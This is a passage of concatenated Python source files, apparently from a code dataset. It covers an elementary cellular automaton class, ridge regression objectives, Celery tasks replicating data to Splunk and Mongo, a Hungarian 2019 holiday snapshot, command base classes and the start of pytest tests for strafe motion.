right = self.__boundary[1]
else:
left = lattice[-1]
right = lattice[0]
code = self.code
if index is None:
if pin_states:
pinned = np.asarray(lattice)[pin]
temp = 2 * left + lattice[0]
for i in range(1, len(lattice)):
temp = 7 & (2 * temp + lattice[i])
lattice[i - 1] = 1 & (code >> temp)
temp = 7 & (2 * temp + right)
lattice[-1] = 1 & (code >> temp)
if pin_states:
for (j, i) in enumerate(pin):
lattice[i] = pinned[j]
else:
if index < 0:
index += len(lattice)
if index == 0:
temp = left
else:
temp = lattice[index - 1]
temp = 2 * temp + lattice[index]
if index + 1 == len(lattice):
temp = 2 * temp + right
else:
temp = 2 * temp + lattice[index + 1]
lattice[index] = 1 & (code >> (7 & temp))
if values is not None:
for key in values:
lattice[key] = values[key]
return lattice
def neighbors_in(self, index, *args, **kwargs):
"""
Return the set of all incoming neighbor nodes.
In the cases of the lattices having fixed boundary conditions, the
left boundary, being on the left of the leftmost index 0, has an index
of -1, while the right boundary's index is the size+1. The full state
of the lattices and the boundaries is equavolent to: `[cell0, cell1,
..., cellN, right_boundary, left_boundary]` if it is ever presented as
a single list in Python.
:param index: node index
:param size: size of ECA
:returns: the set of all node indices which point toward the index node
:raises ValueError: if `index < 0 or index > n - 1`
.. rubric:: Basic Use:
.. doctest:: automata
>>> net = ECA(30)
>>> net.neighbors_in(1, size=3)
{0, 1, 2}
>>> net.neighbors_in(2, size=3)
{0, 1, 2}
>>> net.boundary = (1,1)
>>> net.neighbors_in(2, size=3)
{1, 2, 3}
>>> net.neighbors_in(0, 3)
{0, 1, -1}
.. rubric:: Erroneous Usage:
.. doctest:: automata
>>> net = ECA(30,boundary=(1, 1))
>>> net.neighbors_in(5, 3)
Traceback (most recent call last):
...
ValueError: index must be a non-negative integer less than size
"""
if not isinstance(index, int):
raise TypeError("index must be a non-negative integer")
size = self.size
if index < 0 or index > size - 1:
msg = "index must be a non-negative integer less than size"
raise ValueError(msg)
left, right = index - 1, index + 1
if left < 0 and self.boundary is None:
left = size - 1
if right > size - 1 and self.boundary is None:
right = 0
return {left, index, right}
def neighbors_out(self, index, *args, **kwargs):
"""
Return the set of all outgoing neighbor nodes.
Fixed boundaries are excluded as they are not affected by internal
states.
:param index: node index
:param size: size of ECA
:returns: the set of all node indices which point from the index node
:raises ValueError: if `index < 0 or index > n - 1`
.. rubric:: Basic Use:
.. doctest:: automata
>>> net = ECA(30)
>>> net.neighbors_out(1, 3)
{0, 1, 2}
>>> net.neighbors_out(2, 3)
{0, 1, 2}
>>> net.boundary = (1, 1)
>>> net.neighbors_out(2, 3)
{1, 2}
>>> net.neighbors_out(0, 3)
{0, 1}
.. rubric:: Erroneous Usage:
.. doctest:: automata
>>> net = ECA(30,boundary=(1, 1))
>>> net.neighbors_out(5, 3)
Traceback (most recent call last):
...
ValueError: index must be a non-negative integer less than size
"""
if not isinstance(index, int):
raise TypeError("index must be a non-negative integer")
size = self.size
if index < 0 or index > size - 1:
msg = "index must be a non-negative integer less than size"
raise ValueError(msg)
left, right = index - 1, index + 1
if left < 0:
left = size - 1 if self.boundary is None else 0
if right > size - 1:
right = 0 if self.boundary is None else size - 1
return {left, index, right}
def to_networkx_graph(self, *args, **kwargs):
kwargs['code'] = self.code
kwargs['boundary'] = self.boundary
return super(ECA, self).to_networkx_graph(*args, **kwargs)
BooleanNetwork.register(ECA) | neet/boolean/eca.py | import numpy as np
from .network import BooleanNetwork
class ECA(BooleanNetwork):
"""
ECA is a class to represent elementary cellular automaton rules. Each ECA
contains an 8-bit integral member variable ``code`` representing the
Wolfram code for the ECA rule and a set of boundary conditions which is
either ``None``, signifying periodic boundary conditions, or a pair of
cell states signifying fixed, open boundary conditions.
"""
def __init__(self, code, size, boundary=None):
"""
Construct an elementary cellular automaton rule.
.. rubric:: Examples
.. doctest:: automata
>>> ca = ECA(30, 5)
>>> ca.code
30
>>> ca.size
5
>>> ca.boundary
>>> ca = ECA(30, 5, boundary=(0,0))
>>> ca.boundary
(0, 0)
:param code: the Wolfram code for the ECA
:type code: int
:param size: the size of the ECA's lattice
:type size: int
:param boundary: the boundary conditions for the CA
:type boundary: tuple or None
:raises TypeError: if ``code`` is not an instance of int
:raises ValueError: if ``code`` is not in :math:`\\{0,1,\\ldots,255\\}`
:raises TypeError: if ``boundary`` is neither ``None`` or an instance of tuple
:raises ValueError: if ``boundary`` is a neither ``None`` or a pair of binary states
"""
super(ECA, self).__init__(size)
self.code = code
self.boundary = boundary
@property
def code(self):
"""
The Wolfram code of the elementary cellular automaton
.. rubric:: Examples
.. doctest:: automata
>>> eca = ECA(30, 5)
>>> eca.code
30
>>> eca.code = 45
>>> eca.code
45
>>> eca.code = 256
Traceback (most recent call last):
...
ValueError: invalid ECA code
:type: int
:raises TypeError: if ``code`` is not an instance of int
:raises ValueError: if ``code`` is not in :math:`\\{0,1,\\ldots,255\\}`
"""
return self.__code
@code.setter
def code(self, code):
if not isinstance(code, int):
raise TypeError("ECA code is not an int")
if 255 < code or code < 0:
raise ValueError("invalid ECA code")
self.__code = code
@property
def size(self):
return self._size
@size.setter
def size(self, size):
if not isinstance(size, int):
raise TypeError("ECA size is not an int")
if size < 1:
raise ValueError("ECA size is negative")
self._size = size
self._volume = 2**size
self._shape = [2] * size
@property
def boundary(self):
"""
The boundary conditions of the elemenary cellular automaton
.. rubric:: Examples
.. doctest:: automata
>>> eca = ECA(30)
>>> eca.boundary
>>> eca.boundary = (0,1)
>>> eca.boundary
(0, 1)
>>> eca.boundary = None
>>> eca.boundary
>>> eca.boundary = [0,1]
Traceback (most recent call last):
...
TypeError: ECA boundary are neither None nor a tuple
:type: ``None`` or tuple
:raises TypeError: if ``boundary`` is neither ``None`` or an instance of tuple
:raises ValueError: if ``boundary`` is a neither ``None`` or a pair of binary states
"""
return self.__boundary
@boundary.setter
def boundary(self, boundary):
if boundary and not isinstance(boundary, tuple):
raise TypeError("ECA boundary are neither None nor a tuple")
if boundary:
if len(boundary) != 2:
raise ValueError("invalid ECA boundary conditions")
for x in boundary:
if x != 0 and x != 1:
raise ValueError("invalid ECA boundary value")
self.__boundary = boundary
def _unsafe_update(self, lattice, index=None, pin=None, values=None):
"""
Update the state of the ``lattice``, in place, without
checking the validity of the arguments.
.. rubric:: Basic Use:
.. doctest:: automata
>>> ca = ECA(30)
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs)
[0, 1, 1, 1, 0]
>>> ca.boundary = (1,1)
>>> ca._unsafe_update([0,0,1,0,0])
[1, 1, 1, 1, 1]
.. rubric:: Single-Node Update:
.. doctest:: automata
>>> ca.boundary = None
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs, index=1)
[0, 1, 1, 0, 0]
>>> xs
[0, 1, 1, 0, 0]
>>> ca.boundary = (1,1)
>>> ca._unsafe_update(xs, index=-1)
[0, 1, 1, 0, 1]
.. rubric:: State Pinning:
.. doctest:: automata
>>> ca.boundary = None
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs, pin=[-2])
[0, 1, 1, 0, 0]
>>> ca.boundary = (1,1)
>>> ca._unsafe_update(xs, pin=[4])
[0, 1, 0, 1, 0]
.. rubric:: Value Fixing:
.. doctest:: automata
>>> ca.boundary = None
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs, values={0:1,-2:0})
[1, 1, 1, 0, 0]
>>> ca.boundary = (1,1)
>>> xs = [1,1,1,0,0]
>>> ca._unsafe_update(xs, values={1:0,-1:0})
[0, 0, 0, 1, 0]
:param lattice: the one-dimensional sequence of states
:type lattice: sequence
:param index: the index to update (or None)
:param pin: a sequence of indicies to pin (or None)
:param values: a dictionary of index-value pairs to fix after update
:returns: the updated lattice
"""
pin_states = pin is not None and pin != []
if self.boundary:
left = self.__boundary[0]
right = self.__boundary[1]
else:
left = lattice[-1]
right = lattice[0]
code = self.code
if index is None:
if pin_states:
pinned = np.asarray(lattice)[pin]
temp = 2 * left + lattice[0]
for i in range(1, len(lattice)):
temp = 7 & (2 * temp + lattice[i])
lattice[i - 1] = 1 & (code >> temp)
temp = 7 & (2 * temp + right)
lattice[-1] = 1 & (code >> temp)
if pin_states:
for (j, i) in enumerate(pin):
lattice[i] = pinned[j]
else:
if index < 0:
index += len(lattice)
if index == 0:
temp = left
else:
temp = lattice[index - 1]
temp = 2 * temp + lattice[index]
if index + 1 == len(lattice):
temp = 2 * temp + right
else:
temp = 2 * temp + lattice[index + 1]
lattice[index] = 1 & (code >> (7 & temp))
if values is not None:
for key in values:
lattice[key] = values[key]
return lattice
def neighbors_in(self, index, *args, **kwargs):
"""
Return the set of all incoming neighbor nodes.
In the cases of the lattices having fixed boundary conditions, the
left boundary, being on the left of the leftmost index 0, has an index
of -1, while the right boundary's index is the size+1. The full state
of the lattices and the boundaries is equavolent to: `[cell0, cell1,
..., cellN, right_boundary, left_boundary]` if it is ever presented as
a single list in Python.
:param index: node index
:param size: size of ECA
:returns: the set of all node indices which point toward the index node
:raises ValueError: if `index < 0 or index > n - 1`
.. rubric:: Basic Use:
.. doctest:: automata
>>> net = ECA(30)
>>> net.neighbors_in(1, size=3)
{0, 1, 2}
>>> net.neighbors_in(2, size=3)
{0, 1, 2}
>>> net.boundary = (1,1)
>>> net.neighbors_in(2, size=3)
{1, 2, 3}
>>> net.neighbors_in(0, 3)
{0, 1, -1}
.. rubric:: Erroneous Usage:
.. doctest:: automata
>>> net = ECA(30,boundary=(1, 1))
>>> net.neighbors_in(5, 3)
Traceback (most recent call last):
...
ValueError: index must be a non-negative integer less than size
"""
if not isinstance(index, int):
raise TypeError("index must be a non-negative integer")
size = self.size
if index < 0 or index > size - 1:
msg = "index must be a non-negative integer less than size"
raise ValueError(msg)
left, right = index - 1, index + 1
if left < 0 and self.boundary is None:
left = size - 1
if right > size - 1 and self.boundary is None:
right = 0
return {left, index, right}
def neighbors_out(self, index, *args, **kwargs):
"""
Return the set of all outgoing neighbor nodes.
Fixed boundaries are excluded as they are not affected by internal
states.
:param index: node index
:param size: size of ECA
:returns: the set of all node indices which point from the index node
:raises ValueError: if `index < 0 or index > n - 1`
.. rubric:: Basic Use:
.. doctest:: automata
>>> net = ECA(30)
>>> net.neighbors_out(1, 3)
{0, 1, 2}
>>> net.neighbors_out(2, 3)
{0, 1, 2}
>>> net.boundary = (1, 1)
>>> net.neighbors_out(2, 3)
{1, 2}
>>> net.neighbors_out(0, 3)
{0, 1}
.. rubric:: Erroneous Usage:
.. doctest:: automata
>>> net = ECA(30,boundary=(1, 1))
>>> net.neighbors_out(5, 3)
Traceback (most recent call last):
...
ValueError: index must be a non-negative integer less than size
"""
if not isinstance(index, int):
raise TypeError("index must be a non-negative integer")
size = self.size
if index < 0 or index > size - 1:
msg = "index must be a non-negative integer less than size"
raise ValueError(msg)
left, right = index - 1, index + 1
if left < 0:
left = size - 1 if self.boundary is None else 0
if right > size - 1:
right = 0 if self.boundary is None else size - 1
return {left, index, right}
def to_networkx_graph(self, *args, **kwargs):
kwargs['code'] = self.code
kwargs['boundary'] = self.boundary
return super(ECA, self).to_networkx_graph(*args, **kwargs)
BooleanNetwork.register(ECA) | 0.887507 | 0.517266 |
import torch
from objective.base import Objective
from utils import assert_true
class Ridge(Objective):
def _validate_inputs(self, w, x, y):
assert_true(w.dim() == 2,
"Input w should be 2D")
assert_true(w.size(1) == 1,
"Ridge regression can only perform regression (size 1 output)")
assert_true(x.dim() == 2,
"Input datapoint should be 2D")
assert_true(y.dim() == 1,
"Input label should be 1D")
assert_true(x.size(0) == y.size(0),
"Input datapoint and label should contain the same number of samples")
class Ridge_ClosedForm(Ridge):
def task_error(self, w, x, y):
self._validate_inputs(w, x, y)
# TODO: Compute mean squared error
error = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
return error
def oracle(self, w, x, y):
self._validate_inputs(w, x, y)
# TODO: Compute objective value
a = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
b = torch.mm(w.t(),w).squeeze(-1)*(self.hparams.mu)/2
obj = a + b.squeeze()
# TODO: compute close form solution
atmp = torch.inverse(torch.mm(x.t(),x)*2/x.size()[0] + self.hparams.mu*torch.eye(w.size()[0],w.size()[0]))
#print(torch.mm(x.t(),x)/x.size()[0] + self.hparams.mu*torch.eye(w.size()[0],w.size()[0]))
#print(torch.mm(x.t(),y.unsqueeze(-1)))
sol = torch.mm(atmp,torch.mm(x.t(),y.unsqueeze(-1))*2/x.size()[0])
print(sol)
return {'obj': obj, 'sol': sol}
class Ridge_Gradient(Ridge):
def task_error(self, w, x, y):
self._validate_inputs(w, x, y)
#print(torch.mm(x,w).squeeze(-1))
# TODO: Compute mean squared error
error = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
#print(error)
return error
def oracle(self, w, x, y):
self._validate_inputs(w, x, y)
# TODO: Compute objective value
#print(torch.mm(w.t(),w))
a = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
b = torch.mm(w.t(),w).squeeze(-1)*(self.hparams.mu)/2
#print(b)
obj = a +b.squeeze()
# TODO: compute close form solution
an = torch.mm((2/x.size()[0])*x.t(),(torch.mm(x,w)-y.unsqueeze(-1)))
a2 = self.hparams.mu*w
#print(an)
#print(a2)
dw = (an + a2)
return {'obj': obj, 'dw': dw} | optimization/prac1/objective/ridge.py | import torch
from objective.base import Objective
from utils import assert_true
class Ridge(Objective):
def _validate_inputs(self, w, x, y):
assert_true(w.dim() == 2,
"Input w should be 2D")
assert_true(w.size(1) == 1,
"Ridge regression can only perform regression (size 1 output)")
assert_true(x.dim() == 2,
"Input datapoint should be 2D")
assert_true(y.dim() == 1,
"Input label should be 1D")
assert_true(x.size(0) == y.size(0),
"Input datapoint and label should contain the same number of samples")
class Ridge_ClosedForm(Ridge):
def task_error(self, w, x, y):
self._validate_inputs(w, x, y)
# TODO: Compute mean squared error
error = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
return error
def oracle(self, w, x, y):
self._validate_inputs(w, x, y)
# TODO: Compute objective value
a = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
b = torch.mm(w.t(),w).squeeze(-1)*(self.hparams.mu)/2
obj = a + b.squeeze()
# TODO: compute close form solution
atmp = torch.inverse(torch.mm(x.t(),x)*2/x.size()[0] + self.hparams.mu*torch.eye(w.size()[0],w.size()[0]))
#print(torch.mm(x.t(),x)/x.size()[0] + self.hparams.mu*torch.eye(w.size()[0],w.size()[0]))
#print(torch.mm(x.t(),y.unsqueeze(-1)))
sol = torch.mm(atmp,torch.mm(x.t(),y.unsqueeze(-1))*2/x.size()[0])
print(sol)
return {'obj': obj, 'sol': sol}
class Ridge_Gradient(Ridge):
def task_error(self, w, x, y):
self._validate_inputs(w, x, y)
#print(torch.mm(x,w).squeeze(-1))
# TODO: Compute mean squared error
error = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
#print(error)
return error
def oracle(self, w, x, y):
self._validate_inputs(w, x, y)
# TODO: Compute objective value
#print(torch.mm(w.t(),w))
a = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
b = torch.mm(w.t(),w).squeeze(-1)*(self.hparams.mu)/2
#print(b)
obj = a +b.squeeze()
# TODO: compute close form solution
an = torch.mm((2/x.size()[0])*x.t(),(torch.mm(x,w)-y.unsqueeze(-1)))
a2 = self.hparams.mu*w
#print(an)
#print(a2)
dw = (an + a2)
return {'obj': obj, 'dw': dw} | 0.399343 | 0.704732 |
"""tasks.py: Django data_replication"""
import logging
from celery import shared_task
from .backends.base import ImproperlyConfiguredException
from .backends.mongo import MongoRequest
from .backends.splunk import SplunkRequest
__author__ = '<NAME>'
__date__ = '9/26/17 10:12'
__copyright__ = 'Copyright 2017 IC Manage. All rights reserved.'
__credits__ = ['<NAME>', ]
log = logging.getLogger(__name__)
@shared_task(ignore_result=True, store_errors_even_if_ignored=True)
def push_splunk_objects(**kwargs):
object_ids = kwargs.get('object_ids')
tracker_id = kwargs.get('tracker_id')
content_type_id = kwargs.get('content_type_id')
model_name = kwargs.get('model_name')
replication_class_name = kwargs.get('replication_class_name')
source_type = kwargs.get('source_type', 'json')
source = kwargs.get('source', None)
host = kwargs.get('host', None)
dry_run = kwargs.get('dry_run', False)
assert object_ids is not None, "You failed to include object ids"
assert tracker_id is not None, "You failed to include tracker_id"
assert content_type_id is not None, "You failed to include content_type_id"
assert model_name is not None, "You failed to include model_name"
from data_replication.models import ReplicationTracker
tracker = ReplicationTracker.objects.get(id=tracker_id)
Replicator = tracker.get_replicator(replication_class_name=replication_class_name)
data = Replicator.add_items(object_ids)
for item in data:
if 'model' not in item.keys():
item['model'] = model_name
else:
log.warning("Model already exists?")
assert 'pk' in item.keys(), "Missing pk in model"
try:
splunk = SplunkRequest()
except ImproperlyConfiguredException as err:
log.error("Splunk Improperly configured - %s" % err)
return
splunk.post_data(content=data, source=source, sourcetype=source_type, host=host, dry_run=dry_run)
from data_replication.models import Replication
Replication.objects.filter(
content_type_id=content_type_id, tracker_id=tracker_id,
object_id__in=object_ids).update(state=1)
return "Added %d %s models objects to splunk" % (len(data), model_name)
@shared_task(ignore_result=True, store_errors_even_if_ignored=True)
def push_mongo_objects(**kwargs):
from pymongo.errors import ConnectionFailure, OperationFailure
object_ids = kwargs.get('object_ids')
tracker_id = kwargs.get('tracker_id')
content_type_id = kwargs.get('content_type_id')
model_name = kwargs.get('model_name')
replication_class_name = kwargs.get('replication_class_name')
collection_name = kwargs.get('collection_name', model_name)
assert object_ids is not None, "You failed to include object ids"
assert tracker_id is not None, "You failed to include tracker_id"
assert content_type_id is not None, "You failed to include content_type_id"
assert model_name is not None, "You failed to include model_name"
from data_replication.models import ReplicationTracker
tracker = ReplicationTracker.objects.get(id=tracker_id)
Replicator = tracker.get_replicator(replication_class_name=replication_class_name)
data = Replicator.add_items(object_ids)
for item in data:
assert 'pk' in item.keys(), "Missing pk in model"
try:
mongo = MongoRequest()
except ImproperlyConfiguredException as err:
log.error("Mongo Improperly configured - %s" % err)
return
try:
mongo.post_data(content=data, collection_name=collection_name)
except (ConnectionFailure, OperationFailure) as err:
log.error("Unable to connect to Mongo!! - %s", err)
else:
from data_replication.models import Replication
Replication.objects.filter(
content_type_id=content_type_id, tracker_id=tracker_id,
object_id__in=object_ids).update(state=1)
return "Added %d %s models objects to mongo" % (len(data), collection_name) | data_replication/tasks.py | """tasks.py: Django data_replication"""
import logging
from celery import shared_task
from .backends.base import ImproperlyConfiguredException
from .backends.mongo import MongoRequest
from .backends.splunk import SplunkRequest
__author__ = '<NAME>'
__date__ = '9/26/17 10:12'
__copyright__ = 'Copyright 2017 IC Manage. All rights reserved.'
__credits__ = ['<NAME>', ]
log = logging.getLogger(__name__)
@shared_task(ignore_result=True, store_errors_even_if_ignored=True)
def push_splunk_objects(**kwargs):
object_ids = kwargs.get('object_ids')
tracker_id = kwargs.get('tracker_id')
content_type_id = kwargs.get('content_type_id')
model_name = kwargs.get('model_name')
replication_class_name = kwargs.get('replication_class_name')
source_type = kwargs.get('source_type', 'json')
source = kwargs.get('source', None)
host = kwargs.get('host', None)
dry_run = kwargs.get('dry_run', False)
assert object_ids is not None, "You failed to include object ids"
assert tracker_id is not None, "You failed to include tracker_id"
assert content_type_id is not None, "You failed to include content_type_id"
assert model_name is not None, "You failed to include model_name"
from data_replication.models import ReplicationTracker
tracker = ReplicationTracker.objects.get(id=tracker_id)
Replicator = tracker.get_replicator(replication_class_name=replication_class_name)
data = Replicator.add_items(object_ids)
for item in data:
if 'model' not in item.keys():
item['model'] = model_name
else:
log.warning("Model already exists?")
assert 'pk' in item.keys(), "Missing pk in model"
try:
splunk = SplunkRequest()
except ImproperlyConfiguredException as err:
log.error("Splunk Improperly configured - %s" % err)
return
splunk.post_data(content=data, source=source, sourcetype=source_type, host=host, dry_run=dry_run)
from data_replication.models import Replication
Replication.objects.filter(
content_type_id=content_type_id, tracker_id=tracker_id,
object_id__in=object_ids).update(state=1)
return "Added %d %s models objects to splunk" % (len(data), model_name)
@shared_task(ignore_result=True, store_errors_even_if_ignored=True)
def push_mongo_objects(**kwargs):
from pymongo.errors import ConnectionFailure, OperationFailure
object_ids = kwargs.get('object_ids')
tracker_id = kwargs.get('tracker_id')
content_type_id = kwargs.get('content_type_id')
model_name = kwargs.get('model_name')
replication_class_name = kwargs.get('replication_class_name')
collection_name = kwargs.get('collection_name', model_name)
assert object_ids is not None, "You failed to include object ids"
assert tracker_id is not None, "You failed to include tracker_id"
assert content_type_id is not None, "You failed to include content_type_id"
assert model_name is not None, "You failed to include model_name"
from data_replication.models import ReplicationTracker
tracker = ReplicationTracker.objects.get(id=tracker_id)
Replicator = tracker.get_replicator(replication_class_name=replication_class_name)
data = Replicator.add_items(object_ids)
for item in data:
assert 'pk' in item.keys(), "Missing pk in model"
try:
mongo = MongoRequest()
except ImproperlyConfiguredException as err:
log.error("Mongo Improperly configured - %s" % err)
return
try:
mongo.post_data(content=data, collection_name=collection_name)
except (ConnectionFailure, OperationFailure) as err:
log.error("Unable to connect to Mongo!! - %s", err)
else:
from data_replication.models import Replication
Replication.objects.filter(
content_type_id=content_type_id, tracker_id=tracker_id,
object_id__in=object_ids).update(state=1)
return "Added %d %s models objects to mongo" % (len(data), collection_name) | 0.468791 | 0.224459 |
[
{
'date': '2019-01-01',
'description': 'Újév',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-03-15',
'description': 'Az 1848-as forradalom ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-04-19',
'description': 'Nagypéntek',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-04-21',
'description': 'Húsvét',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-04-22',
'description': 'Húsvéthétfő',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-05-01',
'description': 'A munka ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-06-09',
'description': 'Pünkösd',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-06-10',
'description': 'Pünkösdhétfő',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-08-19',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-08-10 pihenőnap',
'region': '',
'type': 'NF'
},
{
'date': '2019-08-20',
'description': 'Az államalapítás ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-10-23',
'description': 'Az 1956-os forradalom ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-11-01',
'description': 'Mindenszentek',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-24',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-12-07 pihenőnap',
'region': '',
'type': 'NF'
},
{
'date': '2019-12-25',
'description': 'Karácsony',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-26',
'description': 'Karácsony',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-27',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-12-14 pihenőnap',
'region': '',
'type': 'NF'
}
] | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hu_HU-2019] 1.py | [
{
'date': '2019-01-01',
'description': 'Újév',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-03-15',
'description': 'Az 1848-as forradalom ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-04-19',
'description': 'Nagypéntek',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-04-21',
'description': 'Húsvét',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-04-22',
'description': 'Húsvéthétfő',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-05-01',
'description': 'A munka ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-06-09',
'description': 'Pünkösd',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-06-10',
'description': 'Pünkösdhétfő',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-08-19',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-08-10 pihenőnap',
'region': '',
'type': 'NF'
},
{
'date': '2019-08-20',
'description': 'Az államalapítás ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-10-23',
'description': 'Az 1956-os forradalom ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-11-01',
'description': 'Mindenszentek',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-24',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-12-07 pihenőnap',
'region': '',
'type': 'NF'
},
{
'date': '2019-12-25',
'description': 'Karácsony',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-26',
'description': 'Karácsony',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-27',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-12-14 pihenőnap',
'region': '',
'type': 'NF'
}
] | 0.352313 | 0.101456 |
import logging
class CommandBase:
'''
A base class providing functionality common to all commands.
'''
def __init__(self, context):
self._logger = logging.getLogger(__class__.__name__)
self._context = context
@property
def context(self):
'''
The command context.
'''
return self._context
def before_execute(self):
pass
def execute(self):
'''
Executes the logic of this command.
'''
raise Exception('Execute not implemented in {}'.format(__class__.__name__))
class FilterCommandBase(CommandBase):
def __init__(self, context, command_filter=None):
super().__init__(context)
self._filter = command_filter
@property
def filter(self):
return self._filter
@filter.setter
def filter(self, value):
self._filter = value
def execute(self):
'''
Executes the logic of this command.
'''
filtered_tasks = self.get_filtered_tasks()
self.execute_tasks(filtered_tasks)
self._logger.debug('Executed {} command on {} tasks'.format(self.__class__.__name__, len(filtered_tasks)))
def execute_tasks(self, tasks):
'''
Executes the logic of this command against the filtered tasks.
'''
raise Exception('Execute(tasks) not implemented in {}'.format(__class__.__name__))
def get_filtered_tasks(self):
items = self.context.storage.read_all()
filtered_items = self.filter.filter_items(items)
self._logger.debug('Filtered {} items to {}'.format(len(items), len(filtered_items)))
return filtered_items
class CommandParserBase:
def __init__(self, command_name):
self._command_name = command_name
super().__init__()
@property
def command_name(self):
return self._command_name
def parse(self, context, args):
raise Exception('parse not implemented in {}'.format(__class__.__name__))
def print_help(self, console):
console.print(self.get_usage())
def get_confirm_filter(self, context):
return None
def get_usage(self):
return 'tasks {}'.format(self._command_name)
class FilterCommandParserBase(CommandParserBase):
def get_usage(self):
return 'tasks [filter] {}'.format(self.command_name) | tasks/commands/commandbase.py | import logging
class CommandBase:
'''
A base class providing functionality common to all commands.
'''
def __init__(self, context):
self._logger = logging.getLogger(__class__.__name__)
self._context = context
@property
def context(self):
'''
The command context.
'''
return self._context
def before_execute(self):
pass
def execute(self):
'''
Executes the logic of this command.
'''
raise Exception('Execute not implemented in {}'.format(__class__.__name__))
class FilterCommandBase(CommandBase):
def __init__(self, context, command_filter=None):
super().__init__(context)
self._filter = command_filter
@property
def filter(self):
return self._filter
@filter.setter
def filter(self, value):
self._filter = value
def execute(self):
'''
Executes the logic of this command.
'''
filtered_tasks = self.get_filtered_tasks()
self.execute_tasks(filtered_tasks)
self._logger.debug('Executed {} command on {} tasks'.format(self.__class__.__name__, len(filtered_tasks)))
def execute_tasks(self, tasks):
'''
Executes the logic of this command against the filtered tasks.
'''
raise Exception('Execute(tasks) not implemented in {}'.format(__class__.__name__))
def get_filtered_tasks(self):
items = self.context.storage.read_all()
filtered_items = self.filter.filter_items(items)
self._logger.debug('Filtered {} items to {}'.format(len(items), len(filtered_items)))
return filtered_items
class CommandParserBase:
def __init__(self, command_name):
self._command_name = command_name
super().__init__()
@property
def command_name(self):
return self._command_name
def parse(self, context, args):
raise Exception('parse not implemented in {}'.format(__class__.__name__))
def print_help(self, console):
console.print(self.get_usage())
def get_confirm_filter(self, context):
return None
def get_usage(self):
return 'tasks {}'.format(self._command_name)
class FilterCommandParserBase(CommandParserBase):
def get_usage(self):
return 'tasks [filter] {}'.format(self.command_name) | 0.742515 | 0.121764 |
import math
import itertools
import numpy as np
from pytest import raises, approx
from pystrafe import motion
def test_strafe_K():
with raises(ZeroDivisionError):
motion.strafe_K(0, 0, 0, 0)
assert motion.strafe_K(30, 0.001, 320, 0) == 0.0
assert motion.strafe_K(30, 0.01, 320, 10) == approx(90000)
assert motion.strafe_K(30, 0.001, 320, 10) == approx(181760)
assert motion.strafe_K(320, 0.001, 320, 10) == approx(2037760)
assert motion.strafe_K(320, 0.001, 320, 2000) == approx(102400000)
assert motion.strafe_K(30, 0.001, 10, 10) == approx(1990)
assert motion.strafe_K(30, 0.001, 0, 10) == 0
def test_strafe_K_neg_params():
with raises(ValueError):
motion.strafe_K(-10, 10, 10, 10)
with raises(ValueError):
motion.strafe_K(10, -10, 10, 10)
with raises(ValueError):
motion.strafe_K(10, 10, -10, 10)
with raises(ValueError):
